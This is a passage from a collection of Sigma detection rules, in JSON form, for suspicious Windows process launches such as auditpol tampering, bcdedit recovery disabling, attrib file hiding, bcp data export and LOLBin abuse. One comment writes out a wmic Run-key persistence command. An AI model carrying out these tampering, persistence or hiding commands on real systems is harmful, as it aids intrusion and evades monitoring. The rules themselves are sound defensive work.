 filter_optional_office_skype:\n        Image|contains|all:\n            - ':\\Program Files\\Microsoft Office'\n            - '\\SkypeSrv\\'\n        Image|endswith: '\\SKYPESERVER.EXE'\n    filter_optional_office_msouc:\n        Image|contains: ':\\Program Files\\Microsoft Office'\n        Image|endswith: '\\MSOUC.EXE'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_arcsoc_susp_child_process.yml",
    "content": "title: Suspicious ArcSOC.exe Child Process\nid: 8e95e73e-ba02-4a87-b4d7-0929b8053038\nstatus: experimental\ndescription: |\n    Detects script interpreters, command-line tools, and similar suspicious child processes of ArcSOC.exe.\n    ArcSOC.exe is the process name which hosts ArcGIS Server REST services. If an attacker compromises an ArcGIS\n    Server system and uploads a malicious Server Object Extension (SOE), they can send crafted requests to the corresponding\n    service endpoint and remotely execute code from the ArcSOC.exe process.\nreferences:\n    - https://reliaquest.com/blog/threat-spotlight-inside-flax-typhoons-arcgis-compromise/\n    - https://enterprise.arcgis.com/en/server/12.0/administer/windows/inside-an-arcgis-server-site.htm\nauthor: Micah Babinski\ndate: 2025-11-25\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.t1203\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\ArcSOC.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n    filter_main_cmd:\n        Image|endswith: '\\cmd.exe'\n        CommandLine: 'cmd.exe /c \"ver\"'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml",
    "content": "title: AspNetCompiler Execution\nid: a01b8329-5953-4f73-ae2d-aa01e1f35f00 # Exec\nrelated:\n    - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 # SuspChild\n      type: similar\n    - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 # TMP File\n      type: similar\n    - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths\n      type: similar\nstatus: test\ndescription: Detects execution of \"aspnet_compiler.exe\" which can be abused to compile and execute C# code.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/\n    - https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/\nauthor: frack113\ndate: 2021-11-24\nmodified: 2025-02-24\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains:\n            - ':\\Windows\\Microsoft.NET\\Framework\\'\n            - ':\\Windows\\Microsoft.NET\\Framework64\\'\n            - ':\\Windows\\Microsoft.NET\\FrameworkArm\\'\n            - ':\\Windows\\Microsoft.NET\\FrameworkArm64\\'\n        Image|endswith: '\\aspnet_compiler.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml",
    "content": "title: Suspicious Child Process of AspNetCompiler\nid: 9ccba514-7cb6-4c5c-b377-700758f2f120 # SuspChild\nrelated:\n    - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 # TMP File\n      type: similar\n    - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths\n      type: similar\n    - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 # Exec\n      type: similar\nstatus: test\ndescription: Detects potentially suspicious child processes of \"aspnet_compiler.exe\".\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/\n    - https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-14\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\aspnet_compiler.exe'\n    selection_child:\n        # Note: add other potential suspicious child processes and paths\n        - Image|endswith:\n              - '\\calc.exe'\n              - '\\notepad.exe'\n        - Image|contains:\n              - '\\Users\\Public\\'\n              - '\\AppData\\Local\\Temp\\'\n              - '\\AppData\\Local\\Roaming\\'\n              - ':\\Temp\\'\n              - ':\\Windows\\Temp\\'\n              - ':\\Windows\\System32\\Tasks\\'\n              - ':\\Windows\\Tasks\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml",
    "content": "title: Potentially Suspicious ASP.NET Compilation Via AspNetCompiler\nid: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths\nrelated:\n    - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 # SuspChild\n      type: similar\n    - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 # TMP File\n      type: similar\n    - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 # Exec\n      type: similar\nstatus: test\ndescription: Detects execution of \"aspnet_compiler.exe\" with potentially suspicious paths for compilation.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/\n    - https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-14\nmodified: 2025-02-24\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains:\n            - ':\\Windows\\Microsoft.NET\\Framework\\'\n            - ':\\Windows\\Microsoft.NET\\Framework64\\'\n            - ':\\Windows\\Microsoft.NET\\FrameworkArm\\'\n            - ':\\Windows\\Microsoft.NET\\FrameworkArm64\\'\n        Image|endswith: '\\aspnet_compiler.exe'\n        CommandLine|contains:\n            # Note: add other potential suspicious paths\n            - '\\Users\\Public\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Local\\Roaming\\'\n            - ':\\Temp\\'\n            - ':\\Windows\\Temp\\'\n            - ':\\Windows\\System32\\Tasks\\'\n            - ':\\Windows\\Tasks\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml",
    "content": "title: Interactive AT Job\nid: 60fc936d-2eb0-4543-8a13-911c750a1dfc\nstatus: test\ndescription: Detects an interactive AT job, which may be used as a form of privilege escalation.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md\n    - https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html\nauthor: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community\ndate: 2019-10-24\nmodified: 2021-11-27\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.t1053.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\at.exe'\n        CommandLine|contains: 'interactive'\n    condition: selection\nfalsepositives:\n    - Unlikely (at.exe deprecated as of Windows 8)\nlevel: high\nsimulation:\n    - type: atomic-red-team\n      name: At.exe Scheduled task\n      technique: T1053.002\n      atomic_guid: 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_atbroker_uncommon_ats_execution.yml",
    "content": "title: Uncommon  Assistive Technology Applications Execution Via AtBroker.EXE\nid: f24bcaea-0cd1-11eb-adc1-0242ac120002\nstatus: test\ndescription: Detects the start of a non built-in assistive technology applications via \"Atbroker.EXE\".\nreferences:\n    - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/\n    - https://lolbas-project.github.io/lolbas/Binaries/Atbroker/\nauthor: Mateusz Wydra, oscd.community\ndate: 2020-10-12\nmodified: 2024-03-06\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\AtBroker.exe'\n        - OriginalFileName: 'AtBroker.exe'\n    selection_cli:\n        CommandLine|contains: 'start'\n    filter_main_builtin:\n        CommandLine|contains:\n            - 'animations'\n            - 'audiodescription'\n            - 'caretbrowsing'\n            - 'caretwidth'\n            - 'colorfiltering'\n            - 'cursorindicator'\n            - 'cursorscheme'\n            - 'filterkeys'\n            - 'focusborderheight'\n            - 'focusborderwidth'\n            - 'highcontrast'\n            - 'keyboardcues'\n            - 'keyboardpref'\n            - 'livecaptions'\n            - 'magnifierpane'\n            - 'messageduration'\n            - 'minimumhitradius'\n            - 'mousekeys'\n            - 'Narrator'\n            - 'osk'\n            - 'overlappedcontent'\n            - 'showsounds'\n            - 'soundsentry'\n            - 'speechreco'\n            - 'stickykeys'\n            - 'togglekeys'\n            - 'voiceaccess'\n            - 'windowarranging'\n            - 'windowtracking'\n            - 'windowtrackingtimeout'\n            - 'windowtrackingzorder'\n    filter_optional_java:\n        CommandLine|contains: 'Oracle_JavaAccessBridge'\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate, non-default assistive technology applications execution\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_attrib_hiding_files.yml",
    "content": "title: Hiding Files with Attrib.exe\nid: 4281cb20-2994-4580-aa63-c8b86d019934\nstatus: test\ndescription: Detects usage of attrib.exe to hide files from users.\nreferences:\n    - https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/\n    - https://www.uptycs.com/blog/lolbins-are-no-laughing-matter\nauthor: Sami Ruohonen\ndate: 2019-01-16\nmodified: 2023-03-14\ntags:\n    - attack.defense-evasion\n    - attack.t1564.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\attrib.exe'\n        - OriginalFileName: 'ATTRIB.EXE'\n    selection_cli:\n        CommandLine|contains: ' +h '\n    filter_main_msiexec:\n        CommandLine|contains: '\\desktop.ini '\n    filter_optional_intel:\n        ParentImage|endswith: '\\cmd.exe'\n        CommandLine: '+R +H +S +A \\\\\\*.cui'\n        ParentCommandLine: 'C:\\\\WINDOWS\\\\system32\\\\\\*.bat'\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)\n    - Msiexec.exe hiding desktop.ini\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml",
    "content": "title: Set Suspicious Files as System Files Using Attrib.EXE\nid: efec536f-72e8-4656-8960-5e85d091345b\nrelated:\n    - id: bb19e94c-59ae-4c15-8c12-c563d23fe52b\n      type: derived\nstatus: test\ndescription: |\n    Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\nreferences:\n    - https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4\n    - https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0\n    - https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-28\nmodified: 2023-03-14\ntags:\n    - attack.defense-evasion\n    - attack.t1564.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\attrib.exe'\n        - OriginalFileName: 'ATTRIB.EXE'\n    selection_cli:\n        CommandLine|contains: ' +s'\n    selection_paths:\n        CommandLine|contains:\n            - ' %' # Custom Environment variable\n            - '\\Users\\Public\\'\n            - '\\AppData\\Local\\'\n            - '\\ProgramData\\'\n            - '\\Downloads\\'\n            - '\\Windows\\Temp\\'\n    selection_ext:\n        CommandLine|contains:\n            - '.bat'\n            - '.dll'\n            - '.exe'\n            - '.hta'\n            - '.ps1'\n            - '.vbe'\n            - '.vbs'\n    filter_optional_installer:\n        CommandLine|contains|all:\n            - '\\Windows\\TEMP\\'\n            - '.exe'\n    condition: all of selection* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml",
    "content": "title: Audit Policy Tampering Via NT Resource Kit Auditpol\nid: c6c56ada-612b-42d1-9a29-adad3c5c2c1e\nrelated:\n    - id: 0a13e132-651d-11eb-ae93-0242ac130002 # New auditpol version\n      type: similar\nstatus: test\ndescription: |\n    Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\n    This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\nreferences:\n    - https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-12-18\nmodified: 2023-02-21\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - '/logon:none'\n            - '/system:none'\n            - '/sam:none'\n            - '/privilege:none'\n            - '/object:none'\n            - '/process:none'\n            - '/policy:none'\n    condition: selection\nfalsepositives:\n    - The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_auditpol_susp_execution.yml",
    "content": "title: Audit Policy Tampering Via Auditpol\nid: 0a13e132-651d-11eb-ae93-0242ac130002\nrelated:\n    - id: c6c56ada-612b-42d1-9a29-adad3c5c2c1e # Old auditpol\n      type: similar\nstatus: test\ndescription: |\n  Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\n  This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\nreferences:\n    - https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\nauthor: Janantha Marasinghe (https://github.com/blueteam0ps)\ndate: 2021-02-02\nmodified: 2023-02-22\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\auditpol.exe'\n        - OriginalFileName: 'AUDITPOL.EXE'\n    selection_cli:\n        CommandLine|contains:\n            - 'disable' # disables a specific audit policy\n            - 'clear'   # delete or clears audit policy\n            - 'remove'  # removes an audit policy\n            - 'restore' # restores an audit policy\n    condition: all of selection_*\nfalsepositives:\n    - Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_autorun_registry_modified_via_wmic.yml",
    "content": "title: Suspicious Autorun Registry Modified via WMI\nid: c80e66d8-1780-48a9-b412-46663fd21ac0\nstatus: experimental\ndescription: |\n    Detects suspicious activity where the WMIC process is used to create an autorun registry entry via reg.exe, which is often indicative of persistence mechanisms employed by malware.\nreferences:\n    - Internal Research\n    - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-02-17\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1547.001\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_execution_img:\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe' # wmic process call create 'reg.exe add HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Desktops /t REG_SZ /d \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\tre\\Desktops.exe\\\" random\" /f'\n        - ParentImage|endswith: '\\wmiprvse.exe'\n    selection_execution_cmd:\n        CommandLine|contains|all:\n            - 'reg'\n            - ' add '\n        CommandLine|contains:\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'\n            - '\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run'\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run'\n    selection_suspicious_paths_1:\n        CommandLine|contains:\n            - ':\\Perflogs'\n            - :\\ProgramData'\n            - ':\\Windows\\Temp'\n            - ':\\Temp'\n            - '\\AppData\\Local\\Temp'\n            - '\\AppData\\Roaming'\n            - ':\\$Recycle.bin'\n            - ':\\Users\\Default'\n            - ':\\Users\\public'\n            - '%temp%'\n            - '%tmp%'\n            - '%Public%'\n            - '%AppData%'\n    selection_suspicious_paths_user_1:\n        CommandLine|contains: ':\\Users\\'\n    selection_suspicious_paths_user_2:\n        CommandLine|contains:\n            - '\\Favorites'\n            - '\\Favourites'\n            - '\\Contacts'\n            - '\\Music'\n            - '\\Pictures'\n            - '\\Documents'\n            - '\\Photos'\n    condition: all of selection_execution_* and (selection_suspicious_paths_1 or (all of selection_suspicious_paths_user_*))\nfalsepositives:\n    - Legitimate administrative activity or software installations\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_baaupdate_susp_child_process.yml",
    "content": "title: Suspicious BitLocker Access Agent Update Utility Execution\nid: 9f38c1db-e2ae-40bf-81d0-5b68f73fb512\nrelated:\n    - id: 6e8fe0a8-ba0b-4a93-8f9e-82657e7a5984 # BaaUpdate.exe Suspicious DLL Load\n      type: similar\nstatus: experimental\ndescription: |\n    Detects the execution of the BitLocker Access Agent Update Utility (baaupdate.exe) which is not a common parent process for other processes.\n    Suspicious child processes spawned by baaupdate.exe could indicate an attempt at lateral movement via BitLocker DCOM & COM Hijacking.\nreferences:\n    - https://github.com/rtecCyberSec/BitlockMove\nauthor: andrewdanis, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-18\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.lateral-movement\n    - attack.t1021.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\baaupdate.exe'\n        Image|endswith:\n            - '\\bitsadmin.exe'\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell_ise.exe'\n            - '\\powershell.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\schtasks.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bash_command_execution.yml",
    "content": "title: Indirect Inline Command Execution Via Bash.EXE\nid: 5edc2273-c26f-406c-83f3-f4d948e740dd\nrelated:\n    - id: 2d22a514-e024-4428-9dba-41505bd63a5b\n      type: similar\nstatus: test\ndescription: |\n    Detects execution of Microsoft bash launcher with the \"-c\" flag.\n    This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Bash/\nauthor: frack113\ndate: 2021-11-24\nmodified: 2023-08-15\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - ':\\Windows\\System32\\bash.exe'\n              - ':\\Windows\\SysWOW64\\bash.exe'\n        - OriginalFileName: 'Bash.exe'\n    selection_cli:\n        CommandLine|contains: ' -c '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bash_file_execution.yml",
    "content": "title: Indirect Command Execution From Script File Via Bash.EXE\nid: 2d22a514-e024-4428-9dba-41505bd63a5b\nrelated:\n    - id: 5edc2273-c26f-406c-83f3-f4d948e740dd\n      type: similar\nstatus: test\ndescription: |\n    Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly.\n    This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Bash/\n    - https://linux.die.net/man/1/bash\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-15\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith:\n              - ':\\Windows\\System32\\bash.exe'\n              - ':\\Windows\\SysWOW64\\bash.exe'\n        - OriginalFileName: 'Bash.exe'\n    filter_main_cli_flag:\n        CommandLine|contains:\n            # Note: we're not interested in flags being passed first\n            - 'bash.exe -'\n            - 'bash -'\n    filter_main_no_cli:\n        CommandLine: null\n    filter_main_empty:\n        CommandLine: ''\n    filter_main_no_flag:\n        CommandLine:\n            - 'bash.exe'\n            - 'bash'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml",
    "content": "title: Boot Configuration Tampering Via Bcdedit.EXE\nid: 1444443e-6757-43e4-9ea4-c8fc705f79a2\nstatus: stable\ndescription: Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md\n    - https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html\nauthor: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community\ndate: 2019-10-24\nmodified: 2023-02-15\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\bcdedit.exe'\n        - OriginalFileName: 'bcdedit.exe'\n    selection_set:\n        CommandLine|contains: 'set'\n    selection_cli:\n        - CommandLine|contains|all:\n              - 'bootstatuspolicy'\n              - 'ignoreallfailures'\n        - CommandLine|contains|all:\n              - 'recoveryenabled'\n              - 'no'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\nsimulation:\n    - type: atomic-red-team\n      name: Windows - Disable Windows Recovery Console Repair\n      technique: T1490\n      atomic_guid: cf21060a-80b3-4238-a595-22525de4ab81\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bcdedit_susp_execution.yml",
    "content": "title: Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE\nid: c9fbe8e9-119d-40a6-9b59-dd58a5d84429\nstatus: test\ndescription: Detects potential malicious and unauthorized usage of bcdedit.exe\nreferences:\n    - https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set\n    - https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2\nauthor: '@neu5ron'\ndate: 2019-02-07\nmodified: 2023-02-15\ntags:\n    - attack.defense-evasion\n    - attack.t1070\n    - attack.persistence\n    - attack.t1542.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\bcdedit.exe'\n        - OriginalFileName: 'bcdedit.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'delete'\n            - 'deletevalue'\n            - 'import'\n            - 'safeboot'\n            - 'network'\n    condition: all of selection_*\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bcp_export_data.yml",
    "content": "title: Data Export From MSSQL Table Via BCP.EXE\nid: c615d676-f655-46b9-b913-78729021e5d7\nstatus: test\ndescription: |\n    Detects the execution of the BCP utility in order to export data from the database.\n    Attackers were seen saving their malware to a database column or table and then later extracting it via \"bcp.exe\" into a file.\nreferences:\n    - https://docs.microsoft.com/en-us/sql/tools/bcp-utility\n    - https://asec.ahnlab.com/en/61000/\n    - https://asec.ahnlab.com/en/78944/\n    - https://www.huntress.com/blog/attacking-mssql-servers\n    - https://www.huntress.com/blog/attacking-mssql-servers-pt-ii\n    - https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/\n    - https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/\nauthor: Omar Khaled (@beacon_exe), MahirAli Khan (in/mahiralikhan), Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-08-20\ntags:\n    - attack.execution\n    - attack.exfiltration\n    - attack.t1048\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\bcp.exe'\n        - OriginalFileName: 'BCP.exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' out ' # Export data from a table\n            - ' queryout ' # Export data based on a SQL query\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate data export operations.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml",
    "content": "title: Suspicious Child Process Of BgInfo.EXE\nid: 811f459f-9231-45d4-959a-0266c6311987\nrelated:\n    - id: aaf46cdc-934e-4284-b329-34aa701e3771\n      type: similar\nstatus: test\ndescription: Detects suspicious child processes of \"BgInfo.exe\" which could be a sign of potential abuse of the binary to proxy execution via external VBScript\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/\n    - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-16\ntags:\n    - attack.execution\n    - attack.t1059.005\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            - '\\bginfo.exe'\n            - '\\bginfo64.exe'\n    selection_child:\n        - Image|endswith:\n              - '\\calc.exe'\n              - '\\cmd.exe'\n              - '\\cscript.exe'\n              - '\\mshta.exe'\n              - '\\notepad.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\wscript.exe'\n        - Image|contains:\n              - '\\AppData\\Local\\'\n              - '\\AppData\\Roaming\\'\n              - ':\\Users\\Public\\'\n              - ':\\Temp\\'\n              - ':\\Windows\\Temp\\'\n              - ':\\PerfLogs\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml",
    "content": "title: Uncommon Child Process Of BgInfo.EXE\nid: aaf46cdc-934e-4284-b329-34aa701e3771\nrelated:\n    - id: 811f459f-9231-45d4-959a-0266c6311987\n      type: similar\nstatus: test\ndescription: Detects uncommon child processes of \"BgInfo.exe\" which could be a sign of potential abuse of the binary to proxy execution via external VBScript\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/\n    - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/\nauthor: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community\ndate: 2019-10-26\nmodified: 2023-08-16\ntags:\n    - attack.execution\n    - attack.t1059.005\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\bginfo.exe'\n            - '\\bginfo64.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bitlockertogo_execution.yml",
    "content": "title: BitLockerTogo.EXE Execution\nid: 7f2376f9-42ee-4dfc-9360-fecff9a88fc8\nstatus: test\ndescription: |\n    Detects the execution of \"BitLockerToGo.EXE\".\n    BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system.\n    This is a rarely used application and usage of it at all is worth investigating.\n    Malware such as Lumma stealer has been seen using this process as a target for process hollowing.\nreferences:\n    - https://tria.ge/240521-ynezpagf56/behavioral1\n    - https://any.run/report/6eea2773c1b4b5c6fb7c142933e220c96f9a4ec89055bf0cf54accdcde7df535/a407f006-ee45-420d-b576-f259094df091\n    - https://bazaar.abuse.ch/sample/8c75f8e94486f5bbf461505823f5779f328c5b37f1387c18791e0c21f3fdd576/\n    - https://bazaar.abuse.ch/sample/64e6605496919cd76554915cbed88e56fdec10dec6523918a631754664b8c8d3/\nauthor: Josh Nickels, mttaggart\ndate: 2024-07-11\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\BitLockerToGo.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of BitLockerToGo.exe to encrypt portable devices.\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml",
